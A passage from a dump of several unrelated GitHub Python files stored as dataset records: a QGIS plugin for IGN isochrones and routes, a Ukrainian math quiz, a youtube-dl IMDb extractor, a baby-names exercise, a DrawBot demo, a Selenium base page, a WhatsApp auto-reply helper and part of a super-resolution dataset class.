err_provider.addAttributes([QgsField(\"error\", QVariant.String)])\n err_ly.updateFields()\n\n # Création de la liste de requêtes à effectuer\n lst_req = []\n for borne in rq_bornes:\n costValue = str(borne)\n for f in selected_pt:\n geom = f.geometry()\n gx = geom.asPoint().x()\n gy = geom.asPoint().y()\n coord = \"%f,%f\" % (gx, gy)\n feat_attribute = f.attributes()\n lst_req.append((coord, costValue, feat_attribute))\n \n # Effectue les recherche\n for r in lst_req:\n urlq = urla + IGN_KEY + urlb + r[0] + urlc + methode + r[1] + '&graphName=' + graph + urle\n print(urlq)\n res = self.ask_ign_v1(urlq)\n\n print(res)\n if res == \"bug\":\n lst_bug.append((r[0], r[1], \"pas de réponse de l'API\", r[2]))\n elif \"error\" in res:\n lst_bug.append((r[0], r[1], res[\"error\"][\"message\"], r[2]))\n else:\n res_feat = QgsFeature()\n res_feat_geom = QgsGeometry.fromWkt(res[\"wktGeometry\"])\n res_feat.setGeometry(res_feat_geom)\n data = r[2]\n data.append(r[1])\n data.append(self.unit)\n res_feat.setAttributes(data)\n res_provider.addFeature(res_feat)\n nb_ok += 1\n \n self.project.addMapLayer(res_ly)\n\n\n def get_iso_v2(self):\n # Initialisation du compteur de réussite\n nb_ok = 0\n\n # Initialisation de la liste d'erreures\n lst_bug = []\n\n # 
Initialisation des paramètres de recherche\n resource = \"resource=bdtopo-pgr\"\n costType = self.methode\n profile = self.reseau\n\n # test de présence de bornes\n try:\n rq_bornes = self.get_bornes()\n except Exception:\n self.iso_ign_windows.consol.setText(traceback.format_exc())\n if not rq_bornes:\n return\n\n # test si au moins un point origine est selectioné et reprojection en WGS84\n ori_layer = self.iface.activeLayer()\n selected_pt = ori_layer.selectedFeatures()\n\n if selected_pt:\n crsOri = ori_layer.crs()\n crsDest = QgsCoordinateReferenceSystem(\"EPSG:4326\")\n xform = QgsCoordinateTransform(crsOri, crsDest, self.project)\n for pt in selected_pt:\n ptt = pt.geometry()\n if ptt.type() == QgsWkbTypes.PointGeometry:\n ptt.transform(xform)\n pt.setGeometry(ptt)\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Vous ne pouvez selectionner que des géométrie de type 'Point'\")\n return\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Aucun point selectioné!\")\n return\n\n # création du layer de résultats\n res_ly = QgsVectorLayer(\"Polygon\", \"Aire de chalandise\", \"memory\")\n res_provider = res_ly.dataProvider()\n res_provider.addAttributes(ori_layer.fields())\n res_provider.addAttributes([QgsField(\"iso_cost\", QVariant.Int)])\n res_provider.addAttributes([QgsField(\"iso_unit\", QVariant.String)])\n res_ly.updateFields()\n\n # création du layer d'erreures\n err_ly = QgsVectorLayer(\"Point\", \"Erreures Aire de chalandise\", \"memory\")\n err_provider = err_ly.dataProvider()\n err_provider.addAttributes(ori_layer.fields())\n err_provider.addAttributes([QgsField(\"iso_cost\", QVariant.Int)])\n err_provider.addAttributes([QgsField(\"error\", QVariant.String)])\n err_ly.updateFields()\n\n # Création de la liste de requêtes à effectuer\n lst_req = []\n for borne in rq_bornes:\n costValue = str(borne)\n for f in selected_pt:\n geom = f.geometry()\n gx = geom.asPoint().x()\n gy = geom.asPoint().y()\n coord = \"%f,%f\" % (gx, gy)\n feat_attribute = f.attributes()\n lst_req.append((coord, costValue, feat_attribute))\n\n # Effectue les recherche\n for r in lst_req:\n urlq = URL + \"isochrone?\" + resource + \"&\" + profile + \"&\" + costType + \"&costValue=\" + r[1] + \"&point=\" + r[0] + \"&geometryFormat=geojson\"\n\n res = self.ask_ign(urlq)\n if res == \"bug\":\n lst_bug.append((r[0], r[1], \"pas de réponse de l'API\", r[2]))\n elif \"error\" in res:\n lst_bug.append((r[0], r[1], res[\"error\"][\"message\"], r[2]))\n elif res[\"geometry\"][\"type\"] not in [\"Polygon\"]:\n lst_bug.append((r[0], r[1], \"La réponse n'est pas un polygone\", r[2]))\n else:\n res_feat = QgsFeature()\n\n for poly in res[\"geometry\"][\"coordinates\"]:\n val = \"\"\n for pt in poly:\n bi = \"%f %f, \" % (pt[0], pt[1])\n val += bi\n wkt = res[\"geometry\"][\"type\"] + \" \" + \"((\" + val + \"))\"\n res_feat_geom = QgsGeometry.fromWkt(wkt)\n res_feat.setGeometry(res_feat_geom)\n data = r[2]\n data.append(r[1])\n data.append(self.unit)\n res_feat.setAttributes(data)\n res_provider.addFeature(res_feat)\n nb_ok += 1\n\n\n # Test et affiche les résults\n if res_ly.featureCount() > 0:\n self.project.addMapLayer(res_ly)\n res_ly.updateExtents()\n self.iface.layerTreeView().refreshLayerSymbology(res_ly.id())\n self.iso_ign_windows.consol.setText(\"{} aires de chalandises trouvée(s) et {} ont échouée(s)\".format(nb_ok, len(lst_bug)))\n else:\n self.iso_ign_windows.consol.setText(\"Aucune aire de chalandise trouvée. 
Liste des erreures : \" + str(lst_bug))\n \n # Affichage de la couche des erreures\n if len(lst_bug) > 0:\n\n for e in lst_bug:\n e[0].replace(\"'\", '')\n x, y = e[0].split(\",\")\n x = float(x)\n y = float(y)\n err_pt = QgsFeature()\n err_data = e[3]\n err_data.append(e[1])\n err_data.append(e[2])\n err_pt.setAttributes(err_data) \n err_pt.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(x, y)))\n err_provider.addFeatures([err_pt])\n \n self.project.addMapLayer(err_ly)\n\n \n \n\n ########################################################################\n # Mode Itinéraires #\n ########################################################################\n \n def get_iti(self):\n # Initialisation du compteur de réussite\n nb_ok = 0\n\n\n # Initialisation de la liste d'erreures\n lst_bug = []\n\n # Initialisation des paramètres de recherche\n resource = \"resource=bdtopo-pgr\"\n costType = self.methode\n profile = self.reseau\n\n # Initialisation des couches et champs origine et destination\n iti_ly_ori = self.iso_ign_windows.orily_picker.currentLayer()\n iti_f_ori = self.iso_ign_windows.orifield_picker.currentField()\n iti_ly_dest = self.iso_ign_windows.destly_picker.currentLayer()\n iti_f_dest = self.iso_ign_windows.destfield_picker.currentField()\n\n # Initialisation de la couche de résultats\n res_ly = QgsVectorLayer(\"Linestring\", \"itinéraire\", \"memory\")\n res_provider = res_ly.dataProvider()\n\n # Ajout des champs identifiants à la couche des resultats\n res_provider.addAttributes([field for field in iti_ly_ori.fields() if field.name() in [iti_f_ori]])\n res_ly.updateFields()\n res_ly.startEditing()\n idx_to_change = res_ly.fields().names().index(iti_f_ori)\n res_ly.renameAttribute(idx_to_change, \"id_ori\")\n res_ly.commitChanges()\n\n res_provider.addAttributes([field for field in iti_ly_dest.fields() if field.name() in [iti_f_dest]])\n res_ly.updateFields()\n res_ly.startEditing()\n idx_to_change = res_ly.fields().names().index(iti_f_dest)\n res_ly.renameAttribute(idx_to_change, \"id_dest\")\n res_ly.commitChanges()\n\n res_provider.addAttributes([QgsField(\"profile\", QVariant.String)])\n res_provider.addAttributes([QgsField(\"metres\", QVariant.Int)])\n res_provider.addAttributes([QgsField(\"minutes\", QVariant.Int)])\n res_ly.updateFields()\n\n # création d'une liste les coord des origines et l'identifiant :\n selected_ori_pt = iti_ly_ori.selectedFeatures()\n lst_coord_start = []\n if selected_ori_pt:\n\n crsOri = iti_ly_ori.crs()\n crsDest = QgsCoordinateReferenceSystem(\"EPSG:4326\")\n xform = QgsCoordinateTransform(crsOri, crsDest, self.project)\n for pt in selected_ori_pt:\n\n id_origine = pt[iti_f_ori]\n ptt = pt.geometry()\n ptt.transform(xform)\n pt.setGeometry(ptt)\n\n geom = pt.geometry()\n gx = geom.asPoint().x()\n gy = geom.asPoint().y()\n coord_start = \"%f,%f\" % (gx, gy)\n tpl_coord_strat = (id_origine, coord_start)\n lst_coord_start.append(tpl_coord_strat)\n\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Aucune origine selectionée!\")\n return\n\n # création d'une liste les coord des destinations:\n selected_dest_pt = iti_ly_dest.selectedFeatures()\n lst_coord_end = []\n if selected_dest_pt:\n\n crsOri = iti_ly_dest.crs()\n crsDest = QgsCoordinateReferenceSystem(\"EPSG:4326\")\n xform = QgsCoordinateTransform(crsOri, crsDest, self.project)\n\n for pt in selected_dest_pt:\n id_destination = pt[iti_f_dest]\n ptt = pt.geometry()\n ptt.transform(xform)\n pt.setGeometry(ptt)\n\n geom = pt.geometry()\n gx = geom.asPoint().x()\n gy = 
geom.asPoint().y()\n coord_end = \"%f,%f\" % (gx, gy)\n tpl_coord_end = (id_destination, coord_end)\n lst_coord_end.append(tpl_coord_end)\n\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Aucune destination sélectionnée!\")\n return\n\n # Teste la méthode de calcul et création de la liste de requêtes\n methode_iti = self.iso_ign_windows.calciti_picker.currentIndex()\n\n\n # Mode Tous vers Tous\n ###############################################################\n\n if methode_iti == 0:\n # Méthode Tous vers Tous\n lst_od = []\n for o in lst_coord_start:\n for d in lst_coord_end:\n idx_ori = \"{}\".format(o[0])\n idx_dest = \"{}\".format(d[0])\n req_od = \"&start={}&end={}\".format(o[1], d[1])\n req_tpl = (idx_ori, idx_dest, req_od)\n lst_od.append(req_tpl)\n #print(lst_od)\n\n\n # Mode Un vers Un\n ###############################################################\n\n elif methode_iti == 1:\n # Méthode Un à Un\n # Test si le nombre de points est égal entre les origines et les destinations\n if len(lst_coord_start) == len(lst_coord_end):\n tmp_lst_ori = []\n for o in lst_coord_start:\n idx_ori = \"{}\".format(o[0])\n coord_ori = \"&start={}\".format(o[1])\n tmp_lst_ori.append((idx_ori, coord_ori))\n\n tmp_lst_dest = []\n for d in lst_coord_end:\n idx_dest = \"{}\".format(d[0])\n coord_dest = \"&end={}\".format(d[1])\n tmp_lst_dest.append((idx_dest, coord_dest))\n\n lst_od = [(tmp_lst_ori[i][0], tmp_lst_dest[i][0], tmp_lst_ori[i][1] + tmp_lst_dest[i][1]) for i in range(0, len(tmp_lst_ori))]\n\n # tmplst = list(map(lambda x, y: (x, y), lst_coord_start, lst_coord_end))\n\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Le nombre de points de départ et d'arrivée doit être identique.\")\n return\n\n\n # Mode Le plus proche\n ###############################################################\n\n else:\n # Méthode Le plus proche\n # TODO\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Coming soon !\")\n return\n\n # Effectue les requêtes\n for od in lst_od:\n urlq = URL + \"route?\" + resource + \"&\" + profile + \"&\" + costType + od[2] + \"&geometryFormat=geojson\"\n res = self.ask_ign(urlq)\n if res == \"bug\":\n lst_bug.append(\"({}, {}, {})\".format(od[0], od[1], \"pas de réponse de l'API\"))\n elif \"error\" in res:\n lst_bug.append(\"({}, {}, {})\".format(od[0], od[1], res[\"error\"][\"message\"]))\n elif res[\"geometry\"][\"type\"] not in [\"LineString\"]:\n lst_bug.append(\"({}, {}, {})\".format(od[0], od[1], \"La réponse n'est pas une polyligne\"))\n else:\n\n val = \"\"\n for pt in res[\"geometry\"][\"coordinates\"]:\n bi = \"%f %f, \" % (pt[0], pt[1])\n val += bi\n wkt = res[\"geometry\"][\"type\"] + \" \" + \"((\" + val + \"))\"\n\n # Ajout des resultats dans le layer de resultats\n res_feat = QgsFeature()\n res_feat.setAttributes([od[0], od[1], res[\"profile\"], res[\"distance\"], res[\"duration\"]])\n res_feat_geom = QgsGeometry.fromWkt(wkt)\n res_feat.setGeometry(res_feat_geom)\n res_provider.addFeature(res_feat)\n nb_ok += 1\n\n if res_ly.featureCount() > 0:\n self.project.addMapLayer(res_ly)\n res_ly.updateExtents()\n self.iface.layerTreeView().refreshLayerSymbology(res_ly.id())\n self.iso_ign_windows.consol.setText(\"{} itinéraires trouvé(s) et {} ont échoué(s)\".format(nb_ok, len(lst_bug)))\n else:\n self.iso_ign_windows.consol.setText(\"Aucun itinéraire trouvé. 
Liste des erreures : \" + str(lst_bug))\n\n ########################################################################\n # Perform alg #\n ########################################################################\n\n def perform_rq_v2(self):\n # Test des services IGN (désactivé pour le dev)\n # testIgnSrv = str(rss_ign.ressourceIgn.resultats(rss_ign.ressourceIgn))\n testIgnSrv = \"Tous les services de l'IGN fonctionnent\"\n if testIgnSrv == \"Tous les services de l'IGN fonctionnent\":\n\t # charge les paramètres de l'utilisateur\n try:\n self.get_param()\n except Exception:\n self.iso_ign_windows.consol.setText(traceback.format_exc())\n # test de la fonction demandée\n if self.iso_ign_windows.tabWidget.currentWidget().objectName() == \"tab_iso\":\n # recherche d'isochrones\n if self.iso_ign_windows.cb_choix_api.currentText() == \"IGN v2\":\n #print(\"recherche d'aires de chalandises\")\n self.get_iso_v2()\n else:\n self.get_iso_v1()\n \n elif self.iso_ign_windows.tabWidget.currentWidget().objectName() == \"tab_iti\":\n # recherche d'itinéraires\n #print(\"Recherche d'itinéraires\")\n self.get_iti()\n else:\n print(\"Pas de widget de recherche\")\n return\n else:\n self.iso_ign_windows.consol.setText(testIgnSrv)\n return\n\n def run(self):\n \"\"\"Affiche la gui et paramétrages par défaut\"\"\"\n\n self.iso_ign_windows = IsoIGNDialog()\n self.iso_ign_windows.radioButton_pieton.setChecked(True)\n self.iso_ign_windows.radioButton_distance.setChecked(True)\n #testIgnSrv = \"Etats des serveurs de l'IGN : \\n\"+str(rss_ign.ressourceIgn.resultats(rss_ign.ressourceIgn))\n welkom_msg = \"Bienvenue dans IsoIGN v\" + version + \".\\nQue voulez vous faire ?\"\n self.iso_ign_windows.consol.setText(welkom_msg)\n self.iso_ign_windows.bt_ok.clicked.connect(self.perform_rq_v2)\n self.iso_ign_windows.lbl_appver.setText(\"IsoIGN - version \" + version)\n self.iso_ign_windows.show()\n ","repo_name":"cartoinddigo/iso_ign","sub_path":"iso_ign.py","file_name":"iso_ign.py","file_ext":"py","file_size_in_byte":28654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30529747213","text":"'''Написати програму quiz.py, яка показує користувачу випадкове завдання \nта очікує від нього відповідь. \nЯкщо відповідь правильна - привітат��, та запропонувати наступне завдання. \nЯкщо відповідь не правильна - запропонувати розв'язати те ж завдання ще раз. \nЩоб вийти з програми - варто написати q.\n'''\n\nprint('''Вітаю!\nЯ допоможу тобі навчитись розв\\'язувати математичні завдання! 
\nНапиши \\'q\\', щоб вийти або 'n' - щоб перейти до наступного завдання.\n''')\n\nfrom random import randint\n\nvOperationsTuple = ('+', '-', '*', '/')\n\nv1stOperand = randint(1, 100)\nv2ndOperand = randint(1, 100)\nvOperation = randint(0, 3)\nvAnswer = 0\nvNewTask = False\n\nwhile True:\n if vNewTask:\n v1stOperand = randint(1, 100)\n v2ndOperand = randint(1, 100)\n vOperation = randint(0, 3)\n vAnswer = 0 \n\n if vOperation == 0:\n vAnswer = v1stOperand + v2ndOperand\n elif vOperation == 1:\n vAnswer = v1stOperand - v2ndOperand\n elif vOperation == 2:\n vAnswer = v1stOperand * v2ndOperand\n elif vOperation == 3:\n vAnswer = v1stOperand / v2ndOperand\n\n vUserResult = input('Result {} {} {} = '.format(v1stOperand, vOperationsTuple[vOperation], v2ndOperand))\n\n if vUserResult == 'q':\n print('\\nThat\\'s all Folks!')\n break\n elif vUserResult == 'n':\n vNewTask = True\n\n print('\\nSo sad, but as you wish!\\n')\n continue\n else:\n vNewTask = False\n vResult_Error = False\n vResult_Neg = False\n\n vResult = vUserResult.strip()\n\n if vResult.find(',') > 0:\n vResult = vResult.replace(',', '.') \n\n if vResult.find('-') == 0:\n vResult = vResult.replace('-', '')\n vResult_Neg = True\n \n vResult_List = vResult.split('.')\n \n if len(vResult_List) == 1:\n if vResult.isnumeric():\n vResult = int(vResult_List[0])\n else:\n vResult_Error = True\n else:\n if len(vResult_List) == 2:\n vResult_Left = vResult_List[0]\n vResult_Right = vResult_List[1]\n\n if vResult_Left.isnumeric() and vResult_Right.isnumeric():\n vResult_Left = int(vResult_Left)\n vResult_Right = int(vResult_Right)\n\n vResult = vResult_Left + vResult_Right / (10 ** len(str(vResult_Right)))\n else:\n vResult_Error = True\n else:\n vResult_Error = True\n\n if not vResult_Error: \n if vResult_Neg:\n vResult = -1 * vResult\n\n if vResult == vAnswer:\n print('Correctly!\\n')\n\n vNewTask = True\n else:\n print('Unfortunately! Let\\'s try again!\\n') \n else:\n print('Wrong format! Let\\'s try again!\\n') \n","repo_name":"ZSerhii/Beetroot.Academy","sub_path":"Homeworks/quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24825505433","text":"from __future__ import unicode_literals\n\nimport re\n\nfrom .common import InfoExtractor\nfrom ..utils import (\n determine_ext,\n mimetype2ext,\n parse_duration,\n qualities,\n url_or_none,\n)\n\n\nclass ImdbIE(InfoExtractor):\n IE_NAME = 'imdb'\n IE_DESC = 'Internet Movie Database trailers'\n _VALID_URL = r'https?://(?:www|m)\\.imdb\\.com/(?:video|title|list).+?[/-]vi(?P\\d+)'\n\n _TESTS = [{\n 'url': 'http://www.imdb.com/video/imdb/vi2524815897',\n 'info_dict': {\n 'id': '2524815897',\n 'ext': 'mp4',\n 'title': 'No. 
2 from Ice Age: Continental Drift (2012)',\n 'description': 'md5:87bd0bdc61e351f21f20d2d7441cb4e7',\n }\n }, {\n 'url': 'http://www.imdb.com/video/_/vi2524815897',\n 'only_matching': True,\n }, {\n 'url': 'http://www.imdb.com/title/tt1667889/?ref_=ext_shr_eml_vi#lb-vi2524815897',\n 'only_matching': True,\n }, {\n 'url': 'http://www.imdb.com/title/tt1667889/#lb-vi2524815897',\n 'only_matching': True,\n }, {\n 'url': 'http://www.imdb.com/videoplayer/vi1562949145',\n 'only_matching': True,\n }, {\n 'url': 'http://www.imdb.com/title/tt4218696/videoplayer/vi2608641561',\n 'only_matching': True,\n }, {\n 'url': 'https://www.imdb.com/list/ls009921623/videoplayer/vi260482329',\n 'only_matching': True,\n }]\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n webpage = self._download_webpage(\n 'https://www.imdb.com/videoplayer/vi' + video_id, video_id)\n video_metadata = self._parse_json(self._search_regex(\n r'window\\.IMDbReactInitialState\\.push\\(({.+?})\\);', webpage,\n 'video metadata'), video_id)['videos']['videoMetadata']['vi' + video_id]\n title = self._html_search_meta(\n ['og:title', 'twitter:title'], webpage) or self._html_search_regex(\n r'<title>(.+?)</title>', webpage, 'title', fatal=False) or video_metadata['title']\n\n quality = qualities(('SD', '480p', '720p', '1080p'))\n formats = []\n for encoding in video_metadata.get('encodings', []):\n if not encoding or not isinstance(encoding, dict):\n continue\n video_url = url_or_none(encoding.get('videoUrl'))\n if not video_url:\n continue\n ext = mimetype2ext(encoding.get(\n 'mimeType')) or determine_ext(video_url)\n if ext == 'm3u8':\n formats.extend(self._extract_m3u8_formats(\n video_url, video_id, 'mp4', entry_protocol='m3u8_native',\n m3u8_id='hls', fatal=False))\n continue\n format_id = encoding.get('definition')\n formats.append({\n 'format_id': format_id,\n 'url': video_url,\n 'ext': ext,\n 'quality': quality(format_id),\n })\n self._sort_formats(formats)\n\n return {\n 'id': video_id,\n 'title': title,\n 'formats': formats,\n 'description': video_metadata.get('description'),\n 'thumbnail': video_metadata.get('slate', {}).get('url'),\n 'duration': parse_duration(video_metadata.get('duration')),\n }\n\n\nclass ImdbListIE(InfoExtractor):\n IE_NAME = 'imdb:list'\n IE_DESC = 'Internet Movie Database lists'\n _VALID_URL = r'https?://(?:www\\.)?imdb\\.com/list/ls(?P<id>\\d{9})(?!/videoplayer/vi\\d+)'\n _TEST = {\n 'url': 'https://www.imdb.com/list/ls009921623/',\n 'info_dict': {\n 'id': '009921623',\n 'title': 'The Bourne Legacy',\n 'description': 'A list of trailers, clips, and more from The Bourne Legacy, starring Jeremy Renner and Rachel Weisz.',\n },\n 'playlist_count': 8,\n }\n\n def _real_extract(self, url):\n list_id = self._match_id(url)\n webpage = self._download_webpage(url, list_id)\n entries = [\n self.url_result('http://www.imdb.com' + m, 'Imdb')\n for m in re.findall(r'href=\"(/list/ls%s/videoplayer/vi[^\"]+)\"' % list_id, webpage)]\n\n list_title = self._html_search_regex(\n r'<h1[^>]+class=\"[^\"]*header[^\"]*\"[^>]*>(.*?)</h1>',\n webpage, 'list title')\n list_description = self._html_search_regex(\n r'<div[^>]+class=\"[^\"]*list-description[^\"]*\"[^>]*><p>(.*?)</p>
',\n webpage, 'list description')\n\n return self.playlist_result(entries, list_id, list_title, list_description)\n","repo_name":"tvalacarta/tvalacarta","sub_path":"python/main-classic/lib/youtube_dl/extractor/imdb.py","file_name":"imdb.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"47"} +{"seq_id":"1605374403","text":"\"\"\"\n17.7 Baby Names: Each year, the government releases a list of the 10000 most common baby names\nand their frequencies (the number of babies with that name). The only problem with this is that\nsome names have multiple spellings. For example, \"John\" and ''.Jon\" are essentially the same name\nbut would be listed separately in the list. Given two lists, one of names/frequencies and the other\nof pairs of equivalent names, write an algorithm to print a new list of the true frequency of each\nname. Note that if John and Jon are synonyms, and Jon and Johnny are synonyms, then John and\nJohnny are synonyms. (It is both transitive and symmetric.) In the final list, any name can be used\nas the \"real\" name.\nEXAMPLE\nInput:\nNames: John (15), Jon (12), Chris (13), Kris (4), Christopher (19)\nSynonyms: (Jon, John), (John, Johnny), (Chris, Kris), (Chris, Christopher)\nOutput: John (27), Kris (36)\nHints:#478, #493, #512, #537, #586, #605, #655, #675, #704\n\"\"\"\n\n\ndef real_name_freq(freq, syn):\n\tsyn_hash = {}\n\tfor s in syn:\n\t\t#print(s)\n\t\t#print(syn_hash)\n\t\tif s[0] not in syn_hash:\n\t\t\tsyn_hash[s[0]] = [s[1]]\n\t\telse:\n\t\t\tsyn_hash[s[0]].append(s[1])\n\n\t\tif s[1] not in syn_hash:\n\t\t\tsyn_hash[s[1]] = [s[0]]\n\t\telse:\n\t\t\tsyn_hash[s[1]].append(s[0])\n\tprint(syn_hash)\n\tsyn_hash_freq = {}\n\tfor key,value in syn_hash.items():\n\t\tnames = value\n\t\tif names != None:\n\t\t\tfor name in names:\n\t\t\t\tif syn_hash[name]:\n\t\t\t\t\tnames = names + syn_hash[name]\n\t\t\tfor name in names:\n\t\t\t\tsyn_hash[name] = None\n\t\tsyn_hash_freq[str(names)] = 0\n\n\t\tfor key,value in freq.items():\n\t\t\tif names == None:\n\t\t\t\tcontinue\n\t\t\tif key in names:\n\t\t\t\tsyn_hash_freq[str(names)] += value\n\n\treturn syn_hash_freq\n\nnames = {\"John\":15, \"jon\":12,\"Chris\":13, \"Kris\":4, \"Christopher\":19}\nsynonyms = [(\"Jon\", \"John\"), (\"John\", \"Johnny\"), (\"Chris\", \"Kris\"), (\"Chris\", \"Christopher\")]\nprint(real_name_freq(names, synonyms))\n","repo_name":"rshannon3/CTCI","sub_path":"chapter_17/17-7.py","file_name":"17-7.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12361925829","text":"# in this demo, we will draw shapes into an image, and render that image within a clipping path\n\n# define an empty bezier path\nbp = BezierPath()\n\n# define a formatted string\nfs = FormattedString('A', font='Times', fontSize=1500)\n\n# draw our formatted string into the bezier path\n# this is like “create outlines” in illustrator\n# converting text into shapes\nbp.text(fs)\n\n# make an empty image object\nim = ImageObject()\n\n# draw our texture into the image\nwith im:\n # move to center\n translate(width()/2, height()/2)\n # make a lot of dots\n for i in range(10000):\n with savedState():\n # random color\n fill(random(), random(), random())\n # random position\n offsetX = randint(-width()/2, width()/2)\n offsetY = randint(-height()/2, height()/2)\n # random diameter\n d = randint(5, 30)\n # move and draw\n translate(offsetX, offsetY)\n 
oval(-d/2, -d/2, d, d)\n\n# now we are back in the main canvas\n# pass our already-defined BezierPath to the clipPath() function\n# anything after this will be drawn inside our bp\nclipPath(bp)\n\n# apply our image filters\nim.vortexDistortion((width()/2, height()/2), 500)\nim.sepiaTone()\n# draw an image\nimage(im, (0, 0))\n","repo_name":"djrrb/Python-For-Visual-Designers-S2021","sub_path":"session-5/stipple3.py","file_name":"stipple3.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"5117618553","text":"import logging\nimport os.path\nimport allure\nfrom selenium.webdriver import ActionChains\nfrom typing import AnyStr, List\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.alert import Alert\n\nlogger = logging.getLogger(__name__)\n\n\nclass BasePage:\n\n def __init__(self, driver):\n self.driver = driver\n\n def save_screenshot(self):\n index = 0\n os.makedirs(\"screenshots\", exist_ok=True)\n while os.path.exists(f\"screenshots/{index}.png\"):\n index += 1\n self.driver.get_screenshot_as_file(f\"screenshots/{index}.png\")\n\n @allure.step('Input text to {element}')\n def _input(self, element, value) -> None:\n self.click(element)\n element.clear()\n element.send_keys(value)\n\n @allure.step('Waiting element {locator}')\n def element(self, locator: tuple) -> WebElement:\n try:\n return WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(locator))\n except TimeoutException as e:\n logger.exception(e)\n allure.attach(\n name=\"Screenshot\",\n body=self.driver.get_screenshot_as_png(),\n attachment_type=allure.attachment_type.PNG\n )\n self.save_screenshot()\n raise AssertionError(f'Не дождался видимости элемента {locator}')\n\n @allure.step('Waiting not visible element {locator}')\n def not_visible_element(self, locator: tuple) -> bool:\n try:\n return WebDriverWait(self.driver, 2).until(EC.invisibility_of_element_located(locator))\n except TimeoutException as e:\n logger.exception(e)\n allure.attach(\n name=\"Screenshot\",\n body=self.driver.get_screenshot_as_png(),\n attachment_type=allure.attachment_type.PNG\n )\n self.save_screenshot()\n raise AssertionError(f'Элемент до сих пор виден {locator}')\n\n @allure.step('Click button')\n def click(self, element) -> None:\n ActionChains(self.driver).move_to_element(element).pause(0.1).click().perform()\n\n @allure.step('Waiting elements {locator}')\n def elements(self, locator: tuple) -> List[WebElement]:\n try:\n return WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located(locator))\n except TimeoutException as e:\n logger.exception(e)\n allure.attach(\n name=\"Screenshot\",\n body=self.driver.get_screenshot_as_png(),\n attachment_type=allure.attachment_type.PNG\n )\n self.save_screenshot()\n raise AssertionError(f'Не дождался видимости элементов {locator}')\n\n @allure.step('Get text of element {locator}')\n def get_text_of_element(self, locator: tuple) -> AnyStr:\n return self.element(locator).text\n\n @allure.step('Check title with {title}')\n def check_title_page(self, title: str) -> bool:\n return self.driver.title in title\n\n @allure.step('Accept alert')\n def alert_accept(self) -> None:\n try:\n Alert(self.driver).accept()\n except:\n 
return\n","repo_name":"osteron/qa-sdet-final-project","sub_path":"page_objects/BasePage.py","file_name":"BasePage.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"4188064925","text":"import random\r\nfrom time import sleep\r\n\r\n\r\ndef send(driver, message):\r\n driver.find_element_by_xpath(\r\n '//*[@id=\"main\"]/footer/div[1]/div/span[2]/div/div[2]/div[1]/div/div[2]'\r\n ).send_keys(f\"{str(message)}\")\r\n sleep(1)\r\n driver.find_element_by_xpath(\r\n '//*[@id=\"main\"]/footer/div[1]/div/span[2]/div/div[2]/div[2]/button').click()\r\n sleep(1.5)\r\n\r\n\r\ndef messageHandler(driver, message):\r\n if message.lower().strip() in ['hi', 'hey', 'hello']:\r\n resp = ['Hey there, How are you??', 'Hi', 'What\\'s up??']\r\n send(driver, random.choice(resp))\r\n","repo_name":"jackma33/CODES","sub_path":"DROPPED!!/whatsapp-bot/whatsapp/utils/messageHandler.py","file_name":"messageHandler.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16130102035","text":"import torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nimport numpy as np\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nimport argparse\r\nimport torch.optim as optim\r\nimport os\r\nfrom glob import glob\r\nfrom PIL import Image\r\n\r\nfrom models import *\r\n\r\n\r\nclass ResolutionDataset(torch.utils.data.Dataset):\r\n def __init__(self, low_res_dir, high_res_dir, low_res_length, high_res_length):\r\n self.low_res_dir = low_res_dir\r\n self.high_res_dir = high_res_dir\r\n\r\n # low resolution transformation\r\n self.low_res_transform = transforms.Compose([\r\n transforms.Resize((low_res_length, low_res_length),\r\n interpolation=Image.BICUBIC),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=0.5, std=0.5)\r\n ])\r\n\r\n # high resolution transformation\r\n self.high_res_transform = transforms.Compose([\r\n transforms.Resize((high_res_length, high_res_length),\r\n interpolation=Image.BICUBIC),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=0.5, std=0.5)\r\n ])\r\n\r\n # search for png files in respective directories\r\n self.low_res_list = list(\r\n map(Image.open, glob(self.low_res_dir + '*.png')))\r\n self.high_res_list = list(\r\n map(Image.open, glob(self.high_res_dir + '*.png')))\r\n\r\n def __len__(self):\r\n return len(self.low_res_list)\r\n\r\n def __getitem__(self, idx):\r\n if torch.is_tensor(idx):\r\n idx = idx.tolist()\r\n\r\n high_res_image = self.high_res_list[idx]\r\n low_res_image = self.low_res_list[idx]\r\n\r\n high_res_image = self.high_res_transform(high_res_image)\r\n low_res_image = self.low_res_transform(low_res_image)\r\n\r\n return low_res_image, high_res_image\r\n\r\n\r\nclass Trainer():\r\n\r\n def __init__(self, lr_dir_train, hr_dir_train, lr_dir_test, hr_dir_test, lr_length, hr_length, 